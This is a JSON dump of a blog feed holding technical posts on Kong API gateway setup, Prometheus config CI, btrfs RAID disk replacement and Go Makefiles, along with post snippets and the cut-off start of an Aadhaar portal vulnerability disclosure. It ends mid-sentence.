KUAL-KDK-1.0.azw2\nceb207ee4c8d3674f308ff91432aeabf213b203571e270f70b8ae218df6ded7d  KUAL-KDK-2.0.azw2\nfce02f0e104e846f1e4cc0e029500c5a722614d63a47035d78ea4cf59f67a448  kual-mrinstaller-1.6.N.zip\n4a6de1fafe47ec0e3bfb529edead401c92e66b00697d507abe945679b3b7bc65  KUAL-v2.7.zip\n253d0b00b31d62ef9dadb7ca88b98e2718cb35246816b3c50dd63c0a7ef28a52  Update_jailbreak_hotfix_1.14_5.8.10_install.bin\ncc63ba1b454d1f32492c835f108ee04aaa80e6e7a95f12b7216c2c015daa2fbc  Update_jailbreak_hotfix_1.14_nomax_install.bin",[],{"slug":2416,"title":2417,"link":2418,"pubDate":2419,"contentSnippet":2420,"tags":2421,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"setting-up-kong-part-2","Setting up Kong API Gateway - Part 2\u002F2","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsetting-up-kong-part-2\u002F","2019-03-23T06:27:55.000Z","Managing Kong using UI#\nKonga is an unofficial project which is basically an UI for Admin API of Kong. This post is about how to setup Konga and configuring an upstream service. We will also add an authentication layer to our upstream.\nDocker to the rescue#\nWe will use Docker to quickly setup Konga as it a Node.js project and it is a lot of trouble building node projects on server, so let’s just use Docker.\nOur docker-compose.yml for reference:\nversion: \"3.1\"\n\nservices:\n  db:\n    image: postgres\n    restart: always\n    ports:\n      - 5432:5432\n    environment:\n      POSTGRES_PASSWORD: \"\u003Credacted>\"\n    volumes:\n      - \u002Fhome\u002Fubuntu\u002Fdocker\u002Fvolumes\u002Fpostgresql\u002F:\u002Fvar\u002Flib\u002Fpostgresql\u002Fdata\n    networks:\n      - dockergalaxy\n\n  app:\n    image: pantsel\u002Fkonga:latest\n    restart: always\n    ports:\n      - 1337:1337\n    environment:\n      DB_URI: \"postgresql:\u002F\u002Fuser_redacted:pass_redacted@db:5432\u002Fdb_redacted\"\n      DB_ADAPTER: \"postgres\"\n    networks:\n      - dockergalaxy\n\n  nginx:\n    image: nginx:latest\n    ports:\n      - 80:80\n      - 443:443\n    volumes:\n      - \u002Fhome\u002Fubuntu\u002Fdocker\u002Fvolumes\u002Fnginx\u002Fconf\u002F:\u002Fetc\u002Fnginx\u002Fconf.d\n      - \u002Fhome\u002Fubuntu\u002Fdocker\u002Fvolumes\u002Fnginx\u002Fssl\u002F:\u002Fetc\u002Fssl\u002Fcerts\u002Fkonga\u002F\n    networks:\n      - dockergalaxy\n\nnetworks:\n  dockergalaxy:\ndocker-compose pull\ndocker-compose up -d\nVerify, if all 3 containers are up.\n$ docker ps\nCONTAINER ID        IMAGE                  COMMAND                  CREATED             STATUS              PORTS                                      NAMES\n5f20abcd81fc        nginx:latest           \"nginx -g 'daemon of…\"   29 hours ago        Up 28 hours         0.0.0.0:80->80\u002Ftcp, 0.0.0.0:443->443\u002Ftcp   deployment_nginx_1\nff20abcd24a66        pantsel\u002Fkonga:latest   \"\u002Fapp\u002Fstart.sh\"          30 hours ago        Up 29 hours         0.0.0.0:1337->1337\u002Ftcp                     deployment_app_1\n5848abcd27d2a        postgres               \"docker-entrypoint.s…\"   30 hours ago        Up 29 hours         0.0.0.0:5432->5432\u002Ftcp                     deployment_db_1\n\nKonga is running on port 1337 and you can verify the same by doing a curl:\ncurl http:\u002F\u002Flocalhost:1337 # should return HTTP 200\nAdding an Upstream to Kong#\nVisit Konga Admin Dashboard to login. If this is a first time login, you need to activate the connection to Kong’s Admin API by visiting Connections tab. This step needs to be done by each admin user, individually.\n\nSome common terminology before we begin setting up our APIs: (Source)\n\nTermDescription\n\nclientRefers to the downstream client making requests to Kong’s proxy port.\nupstream serviceRefers to your own API\u002Fservice sitting behind Kong, to which client requests are forwarded.\nServiceService are abstraction of each of your own upstream services.\nRouteRoutes are entrypoints into Kong, and defining rules for a request to be matched, and routed to a given Service.\nPluginThis refers to Kong “plugins”, which are pieces of business logic that run in the proxying lifecycle. Plugins can be configured for an individual route, or a service or globally. An example of plugin which we use is Key Auth plugin for authentication.\n\nAdding New Service#\nVisit the Services section and click on Add new Service. Enter the following details for your upstream service here. You can refer to the below screenshot for reference:\n\n\nFieldValue\n\nNameAdd a unique name for your upstream service.\nDescriptionService description.\nTagsList of tags to identify a group of services together. Press ENTER for any kind of array values in Konga UI.\nURLShorthand for setting Host, Path, Protocol with just one value. Note that this is only a feature in Konga, Kong doesn’t have it, when using it with the Admin API calls directly.\n\nVerify the details once and click on Save. Next, we’ll see how to add routes.\nAdding Routes to Services#\nVisit the Services section and click on the service entity you just created.\n\nGo to the routes section and add the a new route entry for the service. You can refer to the below screenshot for reference:\n\n\nFieldValue\n\nNameAdd a unique name for your route.\nHostsKong checks for the hostname present in the incoming request’s header. If you specify this value then the Hostname must be present for Kong to match the request to this route. This is suitable only if you want to block any request made outside this hostname. You can leave it null if not needed.\nPathList of paths present in incoming request. This is required to namespace the upstream endpoints. The client must send this prefix in the request, Kong will try to match any request’s path in this list of paths and based on the settint of strip_path the request will be proxied.\nStrip PathBoolean value, which configures Kong to strip the matching path from the incoming request to the upstream URL.\n\nHow routing actually works#\nKong has the ability to configure really complex routing endpoints based on your usecases. For the simplicity and keeping this guide as generic, the basic (but most common) use case is discussed below by taking an example.\nLet’s say your upstream URL(service) is http:\u002F\u002Fjsonplaceholder.typicode.com\u002F. To setup Kong for this service, we will simply add a route, with the path as \u002Ffake. Here the path acts as a namespace, to differentiate between different services. This can be helpful to avoid route collision if there are a lot of upstream services configured.\nConsider the upstream API endpoint is https:\u002F\u002Fjsonplaceholder.typicode.com\u002Ftodos\u002F.\nIf we specify Kong to have the path as \u002Ffake and set the strip_path as True then our incoming request should look like\nhttps:\u002F\u002Fkongapigateway.com\u002Ffake\u002Ftodos.\nKong will try to match the path \u002Ffake in this incoming request and look for the routes where the path is \u002Ffake. Since it found the correct route, and we have set strip_path to True, Kong will just remove this particular path prefix while reverse proxying to the upstream URL. In this way, our upstream doesn’t need to be concerned about the path prefix as well.\nAdding Consumers#\nStep 1:\nVisit the Consumers section to add consumers for your API. Here the consumers doesn’t really mean 1:1 users, it could be a particular production service wanting to consume another service’s API.\nStep 2:\nClick on Add new consumer and enter the following details:\n\nStep 3:\nAdd the remaining details in the groups section. Visit the Credentials sections, click on API Keys (since we are using Key Auth plugin for authentication) and simply click on Submit button, since Kong will auto generate the API key for you (which most likely will be more secure than any random key you will enter).\n\n\nStep 4:\nLeave the other details as it is. We will add this consumer to our Services page. Visit the services tab, click on the service entity you created and\ngo to Plugins section. Click on Add New Plugin and the select Key Auth from the list.\n\nIn the modal that opens up, you need to specify the consumer UUID which was created (or leave it as blank for all consumers to access). More on controlling the access, is present later in the next section.\n\nStep 5:\nThis feels a bit out of the flow, but after checking out Kong docs, there’s no alternate for this. In the previous step you would have been wondering, what if you need multiple consumers for the service, and want to identify them individually. Since Kong requires you to give either the Consumer UUID or leave it blank so all consumers are tied, the way around this is to use another plugin, called ACL Plugin. With this plugin, you can whitelist a group of consumers, so only the whitelisted consumers can access the API even though you specified All Consumers in the Key Auth plugin. ACL Plugin must be used in conjuction with another authentication plugin.\nYou can refer to the below screenshot for reference:\n\n\nNOTE: This is the same group, which you created at the time of Consumer creation. You can group different consumers based on the service they consume, hence the naming convention one can follow is -consumers.\nYou can see all the eligible consumers for the service, in Eligible Consumers tab.\nUsing Kong as an end user#\nYou need to replace your upstream API endpoints and all other custom authentication with just the Kong’s URL, the namespace for the service, and add\nthe authentication keys in header while sending the request.\nFor example:\nIf your original request is:\ncurl -i -X GET --url http:\u002F\u002Fjsonplaceholder.typicode.com\u002Ftodos\u002F\nThe modified request becomes:\ncurl -i -X GET --url https:\u002F\u002Fkongapigateway.com\u002Ffake\u002Ftodos\u002F --header \"X-ACCESS: ENTER_KEY_HERE\"\nAccessing user authentication details in your API#\nYou can remove all custom authentication method in your API services as Kong forwards the user information in the headers. You can use the following headers while processing the incoming request to identify the users and implement custom business logic:\n\nHeader KeyValue\n\nX-Consumer-IDID of the Consumer on Kong\nX-Consumer-Custom-IDcustom_id of the Consumer (if set)\nX-Consumer-Usernameusername of the Consumer (if set)\nX-Anonymous-Consumerwill be set to true when authentication failed, and the ‘anonymous’ consumer was set instead.\nX-Credential-Usernamethe username of the Credential (only if the consumer is not the ‘anonymous’ consumer)\n\nThe End#\nHope you liked the two part series of setting up and managing your Kong cluster. Do reach out to me @mrkaran_ in case of any feedback for the post. Thanks!",[],{"slug":2423,"title":2424,"link":2425,"pubDate":2426,"contentSnippet":2427,"tags":2428,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"setting-up-kong-part-1","Setting up Kong API Gateway - Part 1\u002F2","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fsetting-up-kong-part-1\u002F","2019-03-23T05:27:55.000Z","Kong#\nKong is an API Gateway, which basically reverse proxies every incoming request to the upstream URL. It is pretty useful if you have a lot of internal services which need to talk to each other (through HTTP) but you don’t want to keep managing the authentication layer, rate limiting, hosts whitelisting and other such things in every service. Kong acts as a central entrypoint to all other services’ API endpoints and all the common fluff is heavylifted by Kong’s API layer.\nKong follows a plugin approach, which makes it extensible and you can even make your own plugins. Using plugins, it is possible to modify the request,\nadd authentication layer at the Kong layer, forward user meta information headers to the upstream.\nAmongst other API Gateway solutions, Kong is pretty straightforward to get started with and has a nice community support as well. All of the actions to configure your API endpoints and manage them can be done through a RESTful Admin API.\nThe following setup guide describes how the infra is setup for High Availability of a cluster of Kong nodes.\nInfra Setup#\nEach individual Kong node is stateless, since it is always connected to an external datastore. In this tutorial, we will provision 2 nodes for Kong. The instances are frontended by Amazon’s ELB which routes the traffic internally to either of a Kong node using internal DNS. Kong requires a datastore to fetch the information about upstream APIs, consumers, routing mechanisms, plugins, so each of the Kong node must be in sync with the other Kong node. We will achieve the same by using Cassandra as our database for Kong, which is being run in a clustering mode. Cassandra uses it’s gossip mechanism to ensure the other Cassandra node is upto-date with any new changes to the data.\nScaling Kong#\nTo scale Kong in future, we can keep on adding multiple Kong nodes horizontally and attaching them to one of the Cassandra node. This way we can have multiple Kong nodes in one cluster each pointing to one central Cassandra datastore.\nSetting up the cluster#\nWe will use Ansible to automate the task of setting up Kong+Cassandra in each of 2 nodes. You can refer to the playbook which will do the job.\n---\n# https:\u002F\u002Fgithub.com\u002Fmr-karan\u002Fkong-ansible\n# Playbook to install the Cassandra and Kong\n\n- hosts: \"{{control_host}}\"\n  remote_user: \"{{control_user}}\"\n  become: yes\n  roles:\n    - role: java\n    - role: cassandra\n- role: kong\nAfter you run the playbook, there are a couple of important things which needs to be configured in order to have an HA setup. This setup guide\nassumes the playbook is run individually on 2 servers: srvr A and srvr B.\nImportant Directory Paths#\n\nLocal locationDescription\n\n\u002Fusr\u002Flocal\u002Fbin\u002FkongKong executable binary\n\u002Fusr\u002Flocal\u002FkongAll the settings and logs are available under a namespaced directory, which will be called as PREFIX in further sections.\n\u002Fetc\u002Fsystemd\u002Fservice\u002Fkong.serviceManaging Kong as systemd service\n\u002Fetc\u002Fsystemd\u002Fservice\u002Fcassandra.serviceManaging Cassandra db as systemd service\n\u002Fetc\u002Fcassandra\u002Fcassandra.yamlConfig for Cassandra\n\u002Fetc\u002Fkong\u002Fkong.confConfig for Kong\n\nFirst Steps#\nSetting up Cassandra#\nLet’s setup Cassandra first and run in clustering mode. Do these steps in both of the servers.\nStop any running cassandra node:\nsudo service cassandra stop\n\n\nEdit the cassandra config file and update the following values:\ncluster_name: 'KongAPICluster'\nseed_provider:\n- class_name: org.apache.cassandra.locator.SimpleSeedProvider\n    parameters:\n        - seeds: \"\u003Cprivate_ip_srvrA>,\u003Cprivate_ip_srvrB>\"\nlisten_address: \u003Cprivate_ip_srvr>\n    start_rpc: true\n\n\nStart cassandra on both the servers and check the status:\nsudo serice cassandra start\n\n\nVerify Cassandra clustering:\nsudo nodetool status # Give it a couple of seconds (30-45) for both nodes to warm up and discover each other.\nThe output of above command should look like:\n$ sudo nodetool status\nDatacenter: datacenter1\n=======================\nStatus=Up\u002FDown\n|\u002F State=Normal\u002FLeaving\u002FJoining\u002FMoving\n--  Address        Load       Tokens       Owns (effective)  Host ID   Rack\nUN  \u003CREDACTED>  467.26 KiB  256          100.0%            \u003CREDACTED>  rack1\nUN  \u003CREDACTED>  496.36 KiB  256          100.0%            \u003CREDACTED>  rack1\n\n\nTroubleshooting Cassandra:\ncqlsh unable to connect to cassandra server:\ncqlsh has a known bug in some versions with Python2.7 where it cannot connect to the cassandra server. Do the following steps to fix:\nsudo pip install cassandra-driver\nexport CQLSH_NO_BUNDLED=TRUE\n\n\nUnable to discover the other cassandra cluster:\nThis usally happens because of network connectivity issues. Verify both nodes are able to talk to each other by running Cassandra in single cluster mode and then issue the following commands:\n# in srvrA\nnetstat -lntvp | grep cassandra # should be present (port 9042 usually)\n# in srvrB, check similarly...\n# in srvrA\ntelnet private_ip_srvrB 9042 # should connect\n# in srvrB, check similarly...\n\n\n\n\nSetting up Kong#\nLet’s setup each Kong node in the cluster as following.\nStop any running kong instance:\nsudo service kong stop\n\n\nEdit the kong config file and update the following values:\n...\nadmin_listen = \u003Cprivate_ip_srvrA>:8001, \u003Cprivate_ip_srvrA>:8444 ssl\ndatabase = cassandra\ndb_update_propagation = 10 #seconds\n...\n\n\nStart kong on both the servers and check the status:\nsudo serice kong start\n\n\nVerify if Kong is running:\nsudo service kong status\n\n\nRun Kong Migrations:\nRun the migrations on only one cluster. Since the datastores will be in sync(eventual consistency thanks to Cassandra), we don’t have to run migrations on the second cluster.\nkong migrations -c \u002Fetc\u002Fpath\u002Fto\u002Fconfig\n\n\nTroubleshooting Kong:\nCheck if Kong is actually running by sudo service kong status. You can check for logs in $PREFIX\u002Flogs\u002Ferror.log.\nIf Kong is not running, you can try running kong check for checking if the config file is correct. Kong additionally provides a health check command, which can be executed using kong health.\nManaging Kong#\nKong comes with Admin API to manage all aspects of Kong. There is also an unofficial project which is aN UI on top of Kong’s API and it comes pretty handy to configure upstream endpoints, adding plugins etc.\nTo read more about it, you can continue reading the second part of the series here",[],{"slug":2430,"title":2431,"link":2432,"pubDate":2433,"contentSnippet":2434,"tags":2435,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"the-absurdity-of-clubbing-ai-blockchain","The absurdity of clubbing AI with blockchain","https:\u002F\u002Fnadh.in\u002Fblog\u002Fthe-absurdity-of-clubbing-ai-blockchain\u002F","Mon, 18 Mar 2019 00:00:00 +0000","AI is a contentious term whose mainstream interpretation refers to not one particular thing, but to a broad category encompassing a wide variety of concepts, techniques, and technologies—all eventually working towards the common goal of eliciting “intelligent\" behaviour in computers.",[],{"slug":2437,"title":2438,"link":2439,"pubDate":2440,"contentSnippet":2441,"tags":2442,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"prometheus-ci","Adding Prometheus configuration to your CI\u002FCD workflow","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fprometheus-ci\u002F","2019-03-17T05:27:55.000Z","Prometheus configurations can turn into a mess in no time if you have a lot of different jobs scraping different targets. Certainly you can use tools like jsonnet to keep your YAML files DRY but this post is not about that. I initially started off by writing one job to scrape a set of EC2 instances in a particular AWS VPC. Over the time, I had a requirement to do it over 3-4 different targets, each of them had their own rules and different type of exporters as well. The whole practice of SSHing into the server, opening the config file in vim and editing in the server didn’t just feel right. No surpises for guessing that I f*cked up a few times with config errors (YAML sigh) and finally decided that I need a better solution for this.\nCI\u002FCD for config files#\n“Wait, so now you’re telling me that I need to setup a full fledged pipeline just for a few config files?”, must have been the thought that echo’ed in your head. Before you jump to the conclusion that it’s overdoing things, IMHO it’s not. And it’s not that difficult either to set it up, so why not? After integrating CI in your workflow, you can be confident that no bad syntax in your PromQL queries or in general the YAML syntax would break your monitoring system.\n“That sounds amazing, show me teh code already”. Our Pipeline is fairly fairly simple:\nLint the code using promtool.\nPush to S3\nWrite a shell script to pull from S3, put the config in right places and restarts Prometheus systemd service\n\nYou can automate the last step too, but I just wanted to keep atleast one manual check in this system so I decided against it. And since I don’t have a distributed Prometheus setup yet, it’s simple to keep things the old school way here .\nYou can do pretty much all of the steps in the above pipeline of any CI of your choice, but I am using Gitlab, so here’s a sample .gitlab-ci.yml file:\nstages:\n  - lint\n  - deploy\n\nprometheus-lint:\n  stage: lint # run this job on stage lint\n  image: golang:1.11-alpine # pull go1.11 image from official docker repo\n  before_script:\n    - apk update && apk add git # install git\n  script:\n    - GOOS=linux GOARCH=amd64 CGO_ENABLED=0 go get -u github.com\u002Fprometheus\u002Fprometheus\u002Fcmd\u002Fpromtool # fetches promtool package\n    - $GOPATH\u002Fbin\u002Fpromtool check rules rules\u002Falerts\u002F* # run the `check rules` command for my prometheus rule files\n\npush-to-s3:\n  stage: deploy # run this job on stage deploy\n  environment:\n    name: production # tag the job metadata in this environment. useful to quickly revert deploys when shit hits the fan\n  image: python:3.7-alpine\n  script:\n    - pip install awscli # adds aws cli tools\n    - aws s3 sync prometheus\u002Frules s3:\u002F\u002Fmybucket\u002Frules\u002F # pushes our rule config files to s3\n  only:\n    refs: # only allow deploy if branch is master.\n      - master\n  when: manual # trigger this job manually\nA brief explanation for the above file:\nstages: Used to define multiple stages in our pipeline and they are executed in order.\njobs: prometheus-lint is one job which will be run in the stage lint. I am using Docker executor with Gitlab runner, so the runner agent talks to the docker executor. Gitlab-CI file is basically an API abstracted to hide away these details from the end user so all the CI\u002FCD files look pretty much the same but behind the scenes the way they are executed totally depends on the executor you choose. Since we are using Docker executor, the image tag is picked up and the same docker image is pulled from a public docker repo for this job.\nbefore_script is basically an event which is called before we begin running our actual CI stuff. You can add your project dependencies here.\nscript is a list of commands to be executed inside your environment (container for us).\nNow that we have our basics about the CI\u002FCD pipeline in place, let us see what each of the jobs is actually doing:\nprometheus-lint: Installs promtool binary and runs it against our rules\u002F folder. The default working directory is our repository itself, so we didn’t have to give the absolute path.\npush-to-s3: Installs aws cli tools, so we can push the files to s3. In case you are wondering where are the access key and secret key present, I have added them as protected variables in my project settings, so only the protected branches (eg master) can access them.\n\nAutomate everything? Nah mate#\nThis is how the deploy.sh script looks like:\n#!\u002Fbin\u002Fsh\naws s3 sync s3:\u002F\u002Fmybucket\u002Frules\u002F \u002Fetc\u002Fprometheus\u002Fconfig\u002Frules\u002F\npromtool check config \u002Fetc\u002Fprometheus\u002Fprometheus.yml\nsudo service prometheus restart\nAs much as I’d like to be a cool hipster and run \u002Fdeploy from my slack bot (last I checked, there’s a legit term for this: ChatOps), I simply don’t prefer that. Having a human intervention before doing critical deployments like this is OK, IMHO. I don’t update the Prometheus config often, so I don’t mind actually SSH-ing into the single instance and triggering a shell script which does the job for me. I also don’t have a distributed Prometheus setup as of yet. Things will definitely change based on your requirements and there’s no one size that fits all.\nI’m much more confident now with my config changes and don’t have to pray to the server overlords everytime I restart Prometheus.\nIt just works .",[],{"slug":2444,"title":2445,"link":2446,"pubDate":2447,"contentSnippet":2448,"tags":2449,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"btrfs-raid-device-replacement-story","Dealing with dead disks in a btrfs RAID1 array","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2019\u002F02\u002F24\u002Fbtrfs-raid-device-replacement-story\u002F","2019-02-24T00:00:00.000Z","tl;dr: Check your disk usage v\u002Fs RAID capacity to ensure that you can remove a disk before trying. If you can connect a new disk without removing the old one, run a btrfs replace - it is much faster.\nMy homeserver setup has a 4 disk setup:\n128GB Samsung EVO 850 SSD as the primary disk (root volume)\nA 3 Disk btrfs RAID1 Array that I use for almost everything else.\nThe 3 disks were:\nA WD-3.5inch-3TB that I shelled from a WD-MyBook. This was the oldest disk in the array\n2xSeagate 2.5-inch-3TB external disks that I shelled from Seagate Expansion disks.\nThe WD disk had been giving rising errors recently, and I was noticing hangs on the system as well:\nMy Steam saves would take time, and hang the game.\nKodi would ocassionaly hang just switching between screens as it would load images from disk.\ngitea, which writes a lot to disk would get similar issues.\nI asked a question on r\u002Farchlinux and confirmed that it indeed a dead disk.\nOrdered a new Seagate Barracuda 3TB the next day, but my peculiar setup caused me a lot of pain before I could remove the dead disk. The primary issue was with the limited number of SATA connectors I had (just 4). The original setup had \u002Fdev\u002Fsdb,\u002Fdev\u002Fsdc,\u002Fdev\u002Fsdd as the three RAID disks with \u002Fdev\u002Fsdb being the dying WD.\nThis is what all I tried:\nRemoving \u002Fdev\u002Fsdb and adding a new disk the array (\u002Fdev\u002Fsde). Unfortunately, to add a disk to the array, you have to mount it first, and the setup just refused to mount in degraded mode. (It didn’t give a visibly error, so I didn’t know why)\nI tried to keep the old disk attached over USB on a friend’s suggestion, but that didn’t work either. This was likely a cable issue, and I didn’t investigate this further.\nBooting with the original three disks but replacing the dying disk with the new one post boot. Didn’t work as I kept getting read\u002Fwrite errors to sdb even after it was disconnected.\nIn short:\nthe system refused to mount the raid array with a missing disk (and I didn’t want to risk a boot with the array unavailable)\nI couldn’t do a live replace because I had a limited number of SATA connectors.\nWhat worked:\nRunning a btrfs device delete and leting it run overnight. It gave an error after quite a long time that finally helped me figure out the problem:\n\nbtrfs device delete \u002Fdev\u002Fsdb1 \u002Fmnt\u002Fxwing\nERROR: error removing device '\u002Fdev\u002Fsdb1': No space left on device\n\nbtrfs fi df \u002Fmnt\u002Fxwing\nData, RAID1: total=2.98TiB, used=2.98TiB\nSystem, RAID1: total=32.00MiB, used=544.00KiB\nMetadata, RAID1: total=5.49GiB, used=4.81GiB\nGlobalReserve, single: total=512.00MiB, used=0.00B\n\n\nThe RAID array was 2.7TBx3 disks and I was storing roughly 2.98TB of data. To switch to a RAID1 setup with just 2 disks, I needed to delete some data. I ended up clearing out a few steam games (bye bye Witcher 3) and ran another btrfs device delete to resolve the issue.\nIf you are faced with a situation where you have to remove a device, but can’t do a live replace, here’s what you need:\nCheck that your disk removal does not impact any data storage. Your n-1 disk array should have enough capacity to store everything.\nRun a btrfs device delete\nReboot\nRe-attach new disk, and then run a btrfs device add\nAs a retro, I posted a summary with the issues I faced on the btrfs mailing list\nIf you’re interested in my self-hosting setup, I’m using Terraform + Docker, the code is hosted on the same server, and I’ve been writing about my experience and learnings:\nPart 1, Hardware\nPart 2, Terraform\u002FDocker\nPart 3, Learnings\nPart 4, Migrating from Google (and more)\nPart 5, Home Server Networking\nPart 6, btrfs RAID device replacement\nIf you have any comments, reach out to me",[],{"slug":2451,"title":2452,"link":2453,"pubDate":2454,"contentSnippet":2455,"tags":2456,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"download-ubuntu-19-04-disco-dingo","Download Ubuntu 19.04 Disco Dingo Daily Build ISO","https:\u002F\u002Fibcomputing.com\u002Fdownload-ubuntu-19-04-disco-dingo\u002F","Fri, 02 Nov 2018 19:54:51 +0000","As Canonical started the development of the next version of Ubuntu operating system last week, early testers can now download Ubuntu 19.04 Disco Dingo daily … \nThe post Download Ubuntu 19.04 Disco Dingo Daily Build ISO appeared first on IB Computing.",[12,2457,2458,2459],"Ubuntu","Free Download","Ubuntu Gnome",{"slug":2461,"title":2462,"link":2463,"pubDate":2464,"contentSnippet":2465,"tags":2466,"maintainerName":15,"maintainerUsername":16,"maintainerPhoto":17,"feedUrl":18},"install-wifi-driver-broadcom-bcm43142-linux","How to Install WiFi driver for Broadcom BCM43142 WiFi device in GNU\u002FLinux Distros","https:\u002F\u002Fibcomputing.com\u002Finstall-wifi-driver-broadcom-bcm43142-linux\u002F","Mon, 15 Oct 2018 20:11:35 +0000","Getting proprietary WiFi drivers to work in GNU\u002FLinux distros can be a pain sometimes. This time we’re going to deal with such a proprietary driver … \nThe post How to Install WiFi driver for Broadcom BCM43142 WiFi device in GNU\u002FLinux Distros appeared first on IB Computing.",[12,2200,2467,2468,2469,2470,2457,2471],"Arch Linux","Broadcom","Debian","Fedora","WiFi",{"slug":2473,"title":2474,"link":2475,"pubDate":2476,"contentSnippet":2477,"tags":2478,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"makefiles-intro","Makefile for Golang projects","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fmakefiles-intro\u002F","2018-10-11T12:40:55.000Z","Makefile is an awesome tool to group together a bunch of different rules and automate your build process. Makefile is used by make which is essentially a file generator tool. It is generally used to compile and build programs from source by following rules listed in the Makefile. People use Makefile for a lot of different purposes as well, for example converting md to html and publish these files to the web server.\nEvery makefile you see, is composed of rules. A rule is declaration of a target and the commands to be executed to generate the target. A target can be a file or an action to be performed (more on that later).\nThis is how a rule looks like in a Makefile\ntarget: dependencies\n    recipe\nWhen you run make target, make searches for the rule which begins with this target and executes the dependecies (if required). It then runs a bunch of commands which are listed in the recipe. An important thing to understand here is that make tracks the dependencies by their last modified time. So if the dependencies haven’t changed, then make will complain with make: 'target' is up to date.\nEnough of theory, let’s get our feet wet by writing our first Makefile. One important thing about Makefile is that you need to use tabs and not spaces. It is one of the rare *nix programs which is whitespace aware and this has been mentioned in The Unix-Haters Handbook as well.\nTo begin with, let’s write a simple rule which removes any tempory object files using go clean and previous binary file using good ol rm:\nclean:\n\tgo clean\n\trm -f sample.bin\nThe target here is clean. There is something special going on here though. Imagine we have a file called clean in our source directory? Let us try to run make clean now\nOur directory structure:.\n├── Makefile\n├── clean\n└── sample.bin\nOn running make clean:\nmake: `clean' is up to date.\nEvery target in Makefile by default is a file target. In our case clean is a file target and make tries to build this file clean but since we already have a file with the same name clean in our directory, make is complaining there’s nothing to do.\nMoreover, in this case our rule is more of an action rather than building files. So for all such scenarios, make provides an easy way where we can instruct it to just run the rule and ignore any filename in our directory. This is called a PHONY target which is a special kind of target. PHONY is just a way in make to forcefully run a target and not care about generating files. Our aim with this rule is to run 2 commands and that’s about it. So this is the perfect example for using PHONY.\nWe can add .PHONY target to our Makefile simply by this line:\n.PHONY : clean\n\nclean:\n\tgo clean\n\trm -f sample.bin\n\nNow when we run make clean we get our expected output\ngo clean\nrm -f sample.bin\nLet us extend our Makefile to do some common tasks:\n.PHONY : build run fresh test clean\n\ntest:\n\tgo test\n\nbuild:\n\tgo build\n\nrun:\n\t.\u002Fsample.bin\n\nclean:\n\tgo clean\n\trm -f sample.bin\nIf you have worked on any Golang project, these are very trivial actions on any Golang project. You will soon realise the power of Makefile when you have to do these steps repeatedly. Some people might argue then you can use aliases or simple shell scripts for the same. I vehemently disagree with that. Reason being, make is a much more powerful tool than just running commands. make has support for dependency tracking and it will only rebuild whatever is required. If you are working on a huge project where the build times are to the tune of hours, you will soon realise why shell scripts are inferior. Ofcourse, someone can point that they can write a shell script to do even that, by fetching the last modified time but why do the extra work when there’s an already existing tried and tested tool? make also has support for parallel task execution, so you can just pass the flag -j {num} to make and it will run these {num} jobs parallely. All these benefits will be apparent for larger projects, but it is a good habit to write Makefile even for smaller projects.\n\nWe will now make our Makefile a bit more sophisticated and introduce variables. If you want to custom name your binary, or inject variables at compile time, you can declare these variables, for example:\nBIN := my-awesome-pro.bin\nHASH := $(shell git rev-parse --short HEAD)\nCOMMIT_DATE := $(shell git show -s --format=%ci ${HASH})\nBUILD_DATE := $(shell date '+%Y-%m-%d %H:%M:%S')\nVERSION := ${HASH} (${COMMIT_DATE})\nWe can modify our Makefile to use these variables:\nbuild:\n\tgo build -o ${BIN} -ldflags=\"-X 'main.buildVersion=${VERSION}' -X 'main.buildDate=${BUILD_DATE}'\"\n\nrun:\n\t.\u002F${BIN}\n\ntest:\n\tgo test\n\nclean:\n\tgo clean\n\trm -f ${BIN}\nWe can auto version our builds and pass variables during the build time with go linker tool, on passing the -X flag. That’s really neat, now whenever we do a make build we get new version of the build automagically.\nSo now we have a working Makefile which helps us with trivial things, but everytime if we need to change something in our program and check, we still need to do these steps manually: make clean, make build and make run. Won’t it be awesome if we could tell Makefile to do all this with just one command? Programmers are lazy creatures after all .\nIn the beginning we saw a target is composed of recipe and dependencies. So we can just create a new PHONY target with all these dependencies and any recipe if we want optionally.\nfresh: clean build run\nWe created a new target which depends on clean to run first, then build and finally run. So everytime if we make some change in our Go program, all we need to run is make fresh. Awesome, isn’t it?\nWe will finally add our last target which is a highly opinionated way of generating binaries for different OS and architectures.\nprod:\n\tgoreleaser --rm-dist --snapshot\n\tcp dist\u002Flinux_amd64\u002F${BIN}-linux.bin .\n\trm -rf dist\nThis target runs goreleaser which is a build automation tool. It then copies the required linux binary to the source directory and removes all the other junk.\nYou can even extend your Makefile to commit files to a repo, and rsync these binaries to the production server or initiate your CI\u002FCD build process. The reason I like Makefile is because it serves as a living documentation for your project on how to build\u002Fdeploy the project making it easier for new contributors to get started.\nSome additional information#\nIf you run make without passing any target name, make will run the first target present in the Makefile. To override this, you should set .DEFAULT_GOAL setting and override the target which you want to make as default.\n.PHONY is just one way to tell make that it is a special kind of target, you can also do the same by creating a target without any recipe. Read this to know more.\nTo know more about Makefile, you can read the manual here\nI hope you now appreciate Makefile and try it out in your next project. I’d love feedback on this blog post, do reach me out at twitter or email\nFin!",[],{"slug":2480,"title":2481,"link":2482,"pubDate":2483,"contentSnippet":2484,"tags":2485,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"aadhaar-disclosure","Aadhaar Vulnerability Public Disclosure","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2018\u002F09\u002F15\u002Faadhaar-disclosure\u002F","2018-09-15T00:00:00.000Z","The Vulnerability\nThe UIDAI Resident Portal (with read access to entire Aadhaar Demographic data) is runing a vulnerable version\nof LifeRay software. It is running LifeRay 6.1, which was declared End-of-Life in Febrary 2016.\nThis release includes multiple known vulnerabilities, including:\nA XSS issue, for which a PoC can be found at resident.uidai.gov.in (Picture Credits: 